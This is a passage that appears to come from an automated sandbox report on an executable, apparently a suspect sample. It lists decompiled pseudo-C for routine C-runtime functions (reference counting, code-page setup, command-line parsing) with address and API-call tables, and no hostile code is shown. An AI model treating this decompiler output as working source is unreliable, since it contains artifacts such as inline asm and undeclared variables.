    0x030081b0
    0x00000000
    0x00000000
    0x030081b2
    0x030081b5
    0x00000000
    0x030081b7
    0x030081b7
    0x00000000
    0x030081b7
    0x030081b5
    0x030081be
    0x030081c1
    0x030081c3
    0x030081c3
    0x030081c4
    0x00000000
    0x030081c4

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,?,?,?,00000000), ref: 030081FB
    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,00000000,?,00000000,?,?,?,?,?,00000000), ref: 03008269
    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 03008285
    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,?,?,00000000), ref: 030082BE
      • Part of subcall function 030089C5: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,030068FF,?,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9), ref: 03008A0A
    • LCMapStringW.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,?,?,?,?,00000000), ref: 03008324
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 03008343
    • __freea.LIBCMT ref: 0300834D
    • __freea.LIBCMT ref: 03008356
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 030065E7, Relevance: 12.1, APIs: 8, Instructions: 61
    C-Code - Quality: 100%
    			E030065E7(LONG* _a4) {
				LONG* _t16;
				LONG* _t17;
				LONG* _t18;
				LONG* _t19;
				LONG* _t20;
				LONG* _t21;
				long* _t32;
				LONG* _t34;

				_t34 = _a4;
				if(_t34 == 0) {
					L18:
					return _t34;
				}
				InterlockedDecrement(_t34);
				_t16 = _t34[0x2c];
				if(_t16 != 0) {
					InterlockedDecrement(_t16);
				}
				_t17 = _t34[0x2e];
				if(_t17 != 0) {
					InterlockedDecrement(_t17);
				}
				_t18 = _t34[0x2d];
				if(_t18 != 0) {
					InterlockedDecrement(_t18);
				}
				_t19 = _t34[0x30];
				if(_t19 != 0) {
					InterlockedDecrement(_t19);
				}
				_t32 =  &(_t34[0x14]);
				_a4 = 6;
				do {
					if( *((intOrPtr*)(_t32 - 8)) != 0x300b974) {
						_t20 =  *_t32;
						if(_t20 != 0) {
							InterlockedDecrement(_t20);
						}
					}
					if( *((intOrPtr*)(_t32 - 4)) != 0) {
						_t21 = _t32[1];
						if(_t21 != 0) {
							InterlockedDecrement(_t21);
						}
					}
					_t32 =  &(_t32[4]);
					_t11 =  &_a4;
					 *_t11 = _a4 - 1;
				} while ( *_t11 != 0);
				InterlockedDecrement(_t34[0x35] + 0xb4);
				goto L18;
			}











    0x030065ed
    0x030065f2
    0x0300667b
    0x0300667f
    0x0300667f
    0x03006601
    0x03006603
    0x0300660b
    0x0300660e
    0x0300660e
    0x03006610
    0x03006618
    0x0300661b
    0x0300661b
    0x0300661d
    0x03006625
    0x03006628
    0x03006628
    0x0300662a
    0x03006632
    0x03006635
    0x03006635
    0x03006637
    0x0300663a
    0x03006641
    0x03006648
    0x0300664a
    0x0300664e
    0x03006651
    0x03006651
    0x0300664e
    0x03006657
    0x03006659
    0x0300665e
    0x03006661
    0x03006661
    0x0300665e
    0x03006663
    0x03006666
    0x03006666
    0x03006666
    0x03006677
    0x00000000

    APIs
    • InterlockedDecrement.KERNEL32(?), ref: 03006601
    • InterlockedDecrement.KERNEL32(?), ref: 0300660E
    • InterlockedDecrement.KERNEL32(?), ref: 0300661B
    • InterlockedDecrement.KERNEL32(?), ref: 03006628
    • InterlockedDecrement.KERNEL32(?), ref: 03006635
    • InterlockedDecrement.KERNEL32(?), ref: 03006651
    • InterlockedDecrement.KERNEL32(00000000), ref: 03006661
    • InterlockedDecrement.KERNEL32(?), ref: 03006677
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03006558, Relevance: 12.1, APIs: 8, Instructions: 58
    C-Code - Quality: 100%
    			E03006558(LONG* _a4) {
				LONG* _t15;
				LONG* _t16;
				LONG* _t17;
				LONG* _t18;
				LONG* _t19;
				LONG* _t20;
				long* _t30;
				LONG* _t31;

				_t31 = _a4;
				InterlockedIncrement(_t31);
				_t15 = _t31[0x2c];
				if(_t15 != 0) {
					InterlockedIncrement(_t15);
				}
				_t16 = _t31[0x2e];
				if(_t16 != 0) {
					InterlockedIncrement(_t16);
				}
				_t17 = _t31[0x2d];
				if(_t17 != 0) {
					InterlockedIncrement(_t17);
				}
				_t18 = _t31[0x30];
				if(_t18 != 0) {
					InterlockedIncrement(_t18);
				}
				_t30 =  &(_t31[0x14]);
				_a4 = 6;
				do {
					if( *((intOrPtr*)(_t30 - 8)) != 0x300b974) {
						_t19 =  *_t30;
						if(_t19 != 0) {
							InterlockedIncrement(_t19);
						}
					}
					if( *((intOrPtr*)(_t30 - 4)) != 0) {
						_t20 = _t30[1];
						if(_t20 != 0) {
							InterlockedIncrement(_t20);
						}
					}
					_t30 =  &(_t30[4]);
					_t11 =  &_a4;
					 *_t11 = _a4 - 1;
				} while ( *_t11 != 0);
				return InterlockedIncrement(_t31[0x35] + 0xb4);
			}











    0x03006566
    0x0300656a
    0x0300656c
    0x03006574
    0x03006577
    0x03006577
    0x03006579
    0x03006581
    0x03006584
    0x03006584
    0x03006586
    0x0300658e
    0x03006591
    0x03006591
    0x03006593
    0x0300659b
    0x0300659e
    0x0300659e
    0x030065a0
    0x030065a3
    0x030065aa
    0x030065b1
    0x030065b3
    0x030065b7
    0x030065ba
    0x030065ba
    0x030065b7
    0x030065c0
    0x030065c2
    0x030065c7
    0x030065ca
    0x030065ca
    0x030065c7
    0x030065cc
    0x030065cf
    0x030065cf
    0x030065cf
    0x030065e6

    APIs
    • InterlockedIncrement.KERNEL32(?), ref: 0300656A
    • InterlockedIncrement.KERNEL32(?), ref: 03006577
    • InterlockedIncrement.KERNEL32(?), ref: 03006584
    • InterlockedIncrement.KERNEL32(?), ref: 03006591
    • InterlockedIncrement.KERNEL32(?), ref: 0300659E
    • InterlockedIncrement.KERNEL32(?), ref: 030065BA
    • InterlockedIncrement.KERNEL32(00000000), ref: 030065CA
    • InterlockedIncrement.KERNEL32(?), ref: 030065E0
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 030063A0, Relevance: 7.6, APIs: 5, Instructions: 116
    C-Code - Quality: 96%
    			E030063A0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t47;
				signed int _t52;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				long _t64;
				LONG* _t67;
				LONG* _t73;
				intOrPtr _t89;
				intOrPtr _t97;
				void* _t98;
				void* _t101;

				_t101 = __eflags;
				_t87 = __edx;
				_push(0x14);
				_push(0x30098f8);
				E03005030(__ebx, __edi, __esi);
				 *(_t98 - 0x20) =  *(_t98 - 0x20) | 0xffffffff;
				_t89 = E03004D40(__ebx, __edx, _t101);
				 *((intOrPtr*)(_t98 - 0x24)) = _t89;
				E03006097(__ebx, __edx, _t89, __esi, _t101);
				_t47 = E0300613B( *((intOrPtr*)(_t98 + 8)));
				 *((intOrPtr*)(_t98 + 8)) = _t47;
				if(_t47 ==  *((intOrPtr*)( *(_t89 + 0x68) + 4))) {
					_t41 = _t98 - 0x20;
					 *_t41 =  *(_t98 - 0x20) & 0x00000000;
					__eflags =  *_t41;
					L26:
					return E03005075( *(_t98 - 0x20));
				}
				_t73 = E030068EE(0x220);
				_t103 = _t73;
				if(_t73 == 0) {
					goto L26;
				}
				memcpy(_t73,  *(_t89 + 0x68), 0x88 << 2);
				 *_t73 =  *_t73 & 0x00000000;
				_t52 = E030061B7(0, _t87, _t103,  *((intOrPtr*)(_t98 + 8)), _t73);
				 *(_t98 - 0x20) = _t52;
				if(_t52 != 0) {
					__eflags = _t52 - 0xffffffff;
					if(_t52 == 0xffffffff) {
						__eflags = _t73 - 0x300b450;
						if(_t73 != 0x300b450) {
							E03006891(_t73);
						}
						 *((intOrPtr*)(E03003EA5())) = 0x16;
					}
				} else {
					_t97 =  *((intOrPtr*)(_t98 - 0x24));
					if(InterlockedDecrement( *(_t97 + 0x68)) == 0) {
						_t69 =  *(_t97 + 0x68);
						if( *(_t97 + 0x68) != 0x300b450) {
							E03006891(_t69);
						}
					}
					 *(_t97 + 0x68) = _t73;
					InterlockedIncrement(_t73);
					if(( *(_t97 + 0x70) & 0x00000002) == 0 && ( *0x300b970 & 0x00000001) == 0) {
						E03006E8E(_t73, InterlockedIncrement, 0xd);
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						 *0x300c664 = _t73[1];
						 *0x300c668 = _t73[2];
						 *0x300c66c = _t73[3];
						_t61 = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t61;
							if(_t61 >= 5) {
								break;
							}
							 *((short*)(0x300c658 + _t61 * 2)) =  *((intOrPtr*)(_t73 + 0x10 + _t61 * 2));
							_t61 = _t61 + 1;
						}
						_t62 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t62;
							__eflags = _t62 - 0x101;
							if(_t62 >= 0x101) {
								break;
							}
							 *((char*)(_t62 + 0x300b670)) =  *((intOrPtr*)( &(_t73[7]) + _t62));
							_t62 = _t62 + 1;
						}
						_t63 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t63;
							__eflags = _t63 - 0x100;
							if(_t63 >= 0x100) {
								break;
							}
							 *((char*)(_t63 + 0x300b778)) =  *((intOrPtr*)( &(_t73[0x47]) + _t63));
							_t63 = _t63 + 1;
						}
						_t64 = InterlockedDecrement( *0x300b878);
						__eflags = _t64;
						if(_t64 == 0) {
							_t67 =  *0x300b878; // 0x12811f8
							__eflags = _t67 - 0x300b450;
							if(_t67 != 0x300b450) {
								E03006891(_t67);
							}
						}
						 *0x300b878 = _t73;
						InterlockedIncrement(_t73);
						 *(_t98 - 4) = 0xfffffffe;
						E03006501();
					}
				}
			}















    0x030063a0
    0x030063a0
    0x030063a0
    0x030063a2
    0x030063a7
    0x030063ac
    0x030063b5
    0x030063b7
    0x030063ba
    0x030063c5
    0x030063ca
    0x030063d0
    0x0300652d
    0x0300652d
    0x0300652d
    0x03006531
    0x03006539
    0x03006539
    0x030063e1
    0x030063e3
    0x030063e5
    0x00000000
    0x00000000
    0x030063f5
    0x030063f7
    0x030063fe
    0x03006405
    0x0300640a
    0x0300650c
    0x0300650f
    0x03006511
    0x03006517
    0x0300651a
    0x0300651f
    0x03006525
    0x03006525
    0x03006410
    0x03006410
    0x0300641e
    0x03006420
    0x03006428
    0x0300642b
    0x03006430
    0x03006428
    0x03006431
    0x0300643b
    0x03006441
    0x03006456
    0x0300645c
    0x03006463
    0x0300646b
    0x03006473
    0x03006478
    0x0300647a
    0x0300647a
    0x03006480
    0x00000000
    0x00000000
    0x03006487
    0x0300648f
    0x0300648f
    0x03006492
    0x03006492
    0x03006494
    0x03006494
    0x03006497
    0x0300649c
    0x00000000
    0x00000000
    0x030064a2
    0x030064a8
    0x030064a8
    0x030064ab
    0x030064ab
    0x030064ad
    0x030064ad
    0x030064b0
    0x030064b5
    0x00000000
    0x00000000
    0x030064be
    0x030064c4
    0x030064c4
    0x030064cd
    0x030064d3
    0x030064d5
    0x030064d7
    0x030064dc
    0x030064e1
    0x030064e4
    0x030064e9
    0x030064e1
    0x030064ea
    0x030064f1
    0x030064f3
    0x030064fa
    0x030064fa
    0x03006441

    APIs
    • __getptd.LIBCMT ref: 030063B0
      • Part of subcall function 03004D40: __amsg_exit.LIBCMT ref: 03004D50
      • Part of subcall function 03006097: __getptd.LIBCMT ref: 030060A3
      • Part of subcall function 03006097: __amsg_exit.LIBCMT ref: 030060C3
      • Part of subcall function 03006097: InterlockedDecrement.KERNEL32(?), ref: 030060F0
      • Part of subcall function 03006097: InterlockedIncrement.KERNEL32(012811F8), ref: 0300611B
      • Part of subcall function 0300613B: GetOEMCP.KERNEL32(00000000), ref: 03006164
      • Part of subcall function 0300613B: GetACP.KERNEL32(00000000), ref: 03006187
      • Part of subcall function 030068EE: Sleep.KERNEL32(00000000,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9,?,?,?,03004C5D,0000000D), ref: 0300690F
      • Part of subcall function 030061B7: setSBCS.LIBCMT ref: 030061E4
      • Part of subcall function 030061B7: IsValidCodePage.KERNEL32(-00000030), ref: 0300622A
      • Part of subcall function 030061B7: GetCPInfo.KERNEL32(00000000,?), ref: 0300623D
      • Part of subcall function 030061B7: setSBUpLow.LIBCMT ref: 0300632B
    • InterlockedDecrement.KERNEL32(?), ref: 03006416
    • InterlockedIncrement.KERNEL32(00000000), ref: 0300643B
      • Part of subcall function 03006E8E: __amsg_exit.LIBCMT ref: 03006EB0
      • Part of subcall function 03006E8E: EnterCriticalSection.KERNEL32(?,?,?,03004C5D,0000000D), ref: 03006EB8
    • InterlockedDecrement.KERNEL32 ref: 030064CD
    • InterlockedIncrement.KERNEL32(00000000), ref: 030064F1
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 030047F9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
    C-Code - Quality: 95%
    			E030047F9() {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __ecx;
				WCHAR* _t14;
				signed int _t17;
				signed int _t18;
				signed int _t28;
				char _t35;
				WCHAR* _t42;
				signed int _t47;

				_push(_t31);
				 *0x300c638 = 0;
				GetModuleFileNameW(0, 0x300c430, 0x104);
				_t14 =  *0x3013098; // 0x241806
				 *0x300bdf4 = 0x300c430;
				if(_t14 == 0) {
					L2:
					_t42 = 0x300c430;
				} else {
					_t42 = _t14;
					if( *_t14 == 0) {
						goto L2;
					}
				}
				_t17 = E030046A3(_t42,  &_v12, 0, 0,  &_v8);
				_t28 = _v8;
				if(_t28 >= 0x3fffffff) {
					L8:
					_t18 = _t17 | 0xffffffff;
				} else {
					_t35 = _v12;
					if(_t35 >= 0x7fffffff) {
						goto L8;
					} else {
						_t17 = _t35 + _t28 * 2 + _t35 + _t28 * 2;
						if(_t17 < _t35 + _t35) {
							goto L8;
						} else {
							_t17 = E030068EE(_t17);
							_t47 = _t17;
							if(_t47 == 0) {
								goto L8;
							} else {
								E030046A3(_t42,  &_v12, _t47 + _t28 * 4, _t47,  &_v8);
								 *0x300bdd4 = _v8 - 1;
								 *0x300bddc = _t47;
								_t18 = 0;
							}
						}
					}
				}
				return _t18;
			}














    0x030047ff
    0x03004813
    0x03004819
    0x0300481f
    0x03004824
    0x0300482c
    0x03004835
    0x03004835
    0x0300482e
    0x0300482e
    0x03004833
    0x00000000
    0x00000000
    0x03004833
    0x03004843
    0x03004848
    0x03004853
    0x0300489f
    0x0300489f
    0x03004855
    0x03004855
    0x0300485e
    0x00000000
    0x03004860
    0x03004863
    0x03004869
    0x00000000
    0x0300486b
    0x0300486c
    0x03004871
    0x03004876
    0x00000000
    0x03004878
    0x03004885
    0x0300488f
    0x03004895
    0x0300489b
    0x0300489b
    0x03004876
    0x03004869
    0x0300485e
    0x030048a6

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\obtG43AWHP.exe,00000104), ref: 03004819
    • _wparse_cmdline.LIBCMT ref: 03004843
      • Part of subcall function 030068EE: Sleep.KERNEL32(00000000,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9,?,?,?,03004C5D,0000000D), ref: 0300690F
    • _wparse_cmdline.LIBCMT ref: 03004885
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03003F3E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E03003F3E(intOrPtr _a4) {
				struct HINSTANCE__* _t2;

				_t2 = GetModuleHandleW(L"mscoree.dll");
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t2, "CorExitProcess");
					if(_t2 != 0) {
						return _t2->i(_a4);
					}
				}
				return _t2;
			}




    0x03003f48
    0x03003f50
    0x03003f58
    0x03003f60
    0x00000000
    0x03003f65
    0x03003f60
    0x03003f68

    APIs
    • GetModuleHandleW.KERNEL32(mscoree.dll,?,03003F76,?,?,030089F4,000000FF,0000001E,00000001,00000000,00000000,?,030068FF,?,00000001,?), ref: 03003F48
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,03003F76,?,?,030089F4,000000FF,0000001E,00000001,00000000,00000000,?,030068FF,?,00000001), ref: 03003F58
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 030061B7, Relevance: 6.2, APIs: 4, Instructions: 159
    C-Code - Quality: 91%
    			E030061B7(void* __ecx, void* __edx, void* __eflags, int _a4, int _a8) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				int _t56;
				signed char _t59;
				int _t61;
				short* _t62;
				signed int _t66;
				signed char* _t78;
				signed int _t81;
				int _t82;
				signed int _t85;
				intOrPtr* _t86;
				int _t91;
				signed char _t92;
				signed int _t93;
				int _t95;
				int _t97;
				signed int _t98;
				signed int _t101;
				intOrPtr* _t104;
				signed int _t105;

				_t53 =  *0x300bbe4; // 0x1979767b
				_v8 = _t53 ^ _t105;
				_t82 = _a8;
				_t97 = E0300613B(_a4);
				_t100 = 0;
				_a4 = _t97;
				if(_t97 != 0) {
					_v32 = 0;
					_t56 = 0;
					__eflags = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t56 + 0x300b880)) - _t97;
						if( *((intOrPtr*)(_t56 + 0x300b880)) == _t97) {
							break;
						}
						_v32 = _v32 + 1;
						_t56 = _t56 + 0x30;
						__eflags = _t56 - 0xf0;
						if(_t56 < 0xf0) {
							continue;
						} else {
							__eflags = _t97 - 0xfde8;
							if(_t97 == 0xfde8) {
								L35:
								_t64 = _t56 | 0xffffffff;
								__eflags = _t56 | 0xffffffff;
							} else {
								__eflags = _t97 - 0xfde9;
								if(_t97 == 0xfde9) {
									goto L35;
								} else {
									_t56 = IsValidCodePage(_t97 & 0x0000ffff);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L35;
									} else {
										_t56 = GetCPInfo(_t97,  &_v28);
										__eflags = _t56;
										if(_t56 == 0) {
											__eflags =  *0x300c654 - _t100; // 0x0
											if(__eflags != 0) {
												goto L1;
											} else {
												goto L35;
											}
										} else {
											E03006C50(_t82 + 0x1c, _t100, 0x101);
											_t95 = 1;
											 *(_t82 + 4) = _t97;
											 *(_t82 + 0xc) = _t100;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t82 + 8) = _t100;
											} else {
												__eflags = _v22;
												if(_v22 != 0) {
													_t104 =  &_v21;
													while(1) {
														_t92 =  *_t104;
														__eflags = _t92;
														if(_t92 == 0) {
															goto L29;
														}
														_t81 =  *(_t104 - 1) & 0x000000ff;
														_t93 = _t92 & 0x000000ff;
														while(1) {
															__eflags = _t81 - _t93;
															if(_t81 > _t93) {
																break;
															}
															 *(_t82 + _t81 + 0x1d) =  *(_t82 + _t81 + 0x1d) | 0x00000004;
															_t81 = _t81 + 1;
															__eflags = _t81;
														}
														_t104 = _t104 + 2;
														__eflags =  *(_t104 - 1);
														if( *(_t104 - 1) != 0) {
															continue;
														}
														goto L29;
													}
												}
												L29:
												_t78 = _t82 + 0x1e;
												_t91 = 0xfe;
												do {
													 *_t78 =  *_t78 | 0x00000008;
													_t78 =  &(_t78[1]);
													_t91 = _t91 - 1;
													__eflags = _t91;
												} while (_t91 != 0);
												 *(_t82 + 0xc) = E03005E74( *(_t82 + 4));
												 *(_t82 + 8) = _t95;
											}
											_t97 = _t82 + 0x10;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L25:
											_t100 = _t82;
											E03005F07(_t82);
											goto L2;
										}
									}
								}
							}
						}
						goto L36;
					}
					E03006C50(_t82 + 0x1c, _t100, 0x101);
					_t85 = _v32 * 0x30;
					_v36 = _t100;
					_t101 = _t85 + 0x300b890;
					_v32 = _t101;
					while(1) {
						L21:
						__eflags =  *_t101;
						if( *_t101 == 0) {
							break;
						}
						_t59 =  *(_t101 + 1);
						__eflags = _t59;
						if(_t59 != 0) {
							_t98 =  *_t101 & 0x000000ff;
							_t66 = _t59 & 0x000000ff;
							while(1) {
								__eflags = _t98 - _t66;
								if(_t98 > _t66) {
									break;
								}
								 *(_t82 + _t98 + 0x1d) =  *(_t82 + _t98 + 0x1d) |  *(_v36 + 0x300b87c);
								_t66 =  *(_t101 + 1) & 0x000000ff;
								_t98 = _t98 + 1;
								__eflags = _t98;
							}
							_t97 = _a4;
							_t101 = _t101 + 2;
							__eflags = _t101;
							continue;
						}
						break;
					}
					_v36 = _v36 + 1;
					_t101 = _v32 + 8;
					__eflags = _v36 - 4;
					_v32 = _t101;
					if(_v36 < 4) {
						goto L21;
					}
					 *(_t82 + 4) = _t97;
					 *(_t82 + 8) = 1;
					_t61 = E03005E74(_t97);
					 *(_t82 + 0xc) = _t61;
					_t62 = _t82 + 0x10;
					_t86 = _t85 + 0x300b884;
					_t95 = 6;
					do {
						 *_t62 =  *_t86;
						_t86 = _t86 + 2;
						_t62 = _t62 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L25;
				} else {
					L1:
					E03005EA3(_t82);
					L2:
					_t64 = 0;
				}
				L36:
				return E03006BA0(_t64, _t82, _v8 ^ _t105, _t95, _t97, _t100);
			}
































    0x030061bf
    0x030061c6
    0x030061ca
    0x030061d7
    0x030061d9
    0x030061db
    0x030061e0
    0x030061f0
    0x030061f3
    0x030061f3
    0x030061f5
    0x030061f5
    0x030061fb
    0x00000000
    0x00000000
    0x03006201
    0x03006204
    0x03006207
    0x0300620c
    0x00000000
    0x0300620e
    0x0300620e
    0x03006214
    0x0300638e
    0x0300638e
    0x0300638e
    0x0300621a
    0x0300621a
    0x03006220
    0x00000000
    0x03006226
    0x0300622a
    0x03006230
    0x03006232
    0x00000000
    0x03006238
    0x0300623d
    0x03006243
    0x03006245
    0x03006382
    0x03006388
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0300624b
    0x03006255
    0x0300625c
    0x03006260
    0x03006263
    0x03006266
    0x03006269
    0x0300636b
    0x0300626f
    0x0300626f
    0x03006273
    0x03006279
    0x0300627c
    0x0300627c
    0x0300627e
    0x03006280
    0x00000000
    0x00000000
    0x03006286
    0x0300628a
    0x0300633b
    0x0300633b
    0x0300633d
    0x00000000
    0x00000000
    0x03006335
    0x0300633a
    0x0300633a
    0x0300633a
    0x0300633f
    0x03006342
    0x03006346
    0x00000000
    0x00000000
    0x00000000
    0x03006346
    0x0300627c
    0x0300634c
    0x0300634c
    0x0300634f
    0x03006354
    0x03006354
    0x03006357
    0x03006358
    0x03006358
    0x03006358
    0x03006363
    0x03006366
    0x03006366
    0x0300637a
    0x0300637d
    0x0300637e
    0x0300637f
    0x03006329
    0x03006329
    0x0300632b
    0x00000000
    0x0300632b
    0x03006245
    0x03006232
    0x03006220
    0x03006214
    0x00000000
    0x0300620c
    0x0300629c
    0x030062a7
    0x030062aa
    0x030062ad
    0x030062b3
    0x030062e3
    0x030062e3
    0x030062e3
    0x030062e6
    0x00000000
    0x00000000
    0x030062b8
    0x030062bb
    0x030062bd
    0x030062bf
    0x030062c2
    0x030062d9
    0x030062d9
    0x030062db
    0x00000000
    0x00000000
    0x030062d0
    0x030062d4
    0x030062d8
    0x030062d8
    0x030062d8
    0x030062dd
    0x030062e0
    0x030062e0
    0x00000000
    0x030062e0
    0x00000000
    0x030062bd
    0x030062eb
    0x030062ee
    0x030062f1
    0x030062f5
    0x030062f8
    0x00000000
    0x00000000
    0x030062fc
    0x030062ff
    0x03006306
    0x0300630d
    0x03006310
    0x03006313
    0x03006319
    0x0300631a
    0x0300631d
    0x03006320
    0x03006323
    0x03006326
    0x03006326
    0x03006326
    0x00000000
    0x030061e2
    0x030061e2
    0x030061e4
    0x030061e9
    0x030061e9
    0x030061e9
    0x03006391
    0x0300639f

    APIs
      • Part of subcall function 0300613B: GetOEMCP.KERNEL32(00000000), ref: 03006164
      • Part of subcall function 0300613B: GetACP.KERNEL32(00000000), ref: 03006187
    • IsValidCodePage.KERNEL32(-00000030), ref: 0300622A
    • GetCPInfo.KERNEL32(00000000,?), ref: 0300623D
    • setSBUpLow.LIBCMT ref: 0300632B
      • Part of subcall function 03005F07: GetCPInfo.KERNEL32(?,?), ref: 03005F28
      • Part of subcall function 03005F07: ___crtGetStringTypeA.LIBCMT ref: 03005FA5
      • Part of subcall function 03005F07: ___crtLCMapStringA.LIBCMT ref: 03005FC5
      • Part of subcall function 03005F07: ___crtLCMapStringA.LIBCMT ref: 03005FEA
    • setSBCS.LIBCMT ref: 030061E4
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 030083B7, Relevance: 6.1, APIs: 4, Instructions: 92
    C-Code - Quality: 79%
    			E030083B7(void* __ecx, intOrPtr __edx, intOrPtr* _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t27;
				intOrPtr _t33;
				int _t37;
				void* _t40;
				short* _t41;
				short* _t47;
				intOrPtr _t48;
				intOrPtr _t54;
				int _t56;
				intOrPtr _t57;
				intOrPtr _t60;
				signed int _t61;
				short* _t62;

				_t54 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t27 =  *0x300bbe4; // 0x1979767b
				_v8 = _t27 ^ _t61;
				_t47 = 0;
				_v12 = 0;
				if(_a24 == 0) {
					_a24 =  *((intOrPtr*)( *_a4 + 4));
				}
				_t56 = MultiByteToWideChar(_a24, 1 + (0 | _a28 != _t47) * 8, _a12, _a16, _t47, _t47);
				if(_t56 != _t47) {
					if(__eflags > 0) {
						__eflags = _t56 - 0x7ffffff0;
						if(_t56 <= 0x7ffffff0) {
							_t16 = _t56 + 8; // 0x8
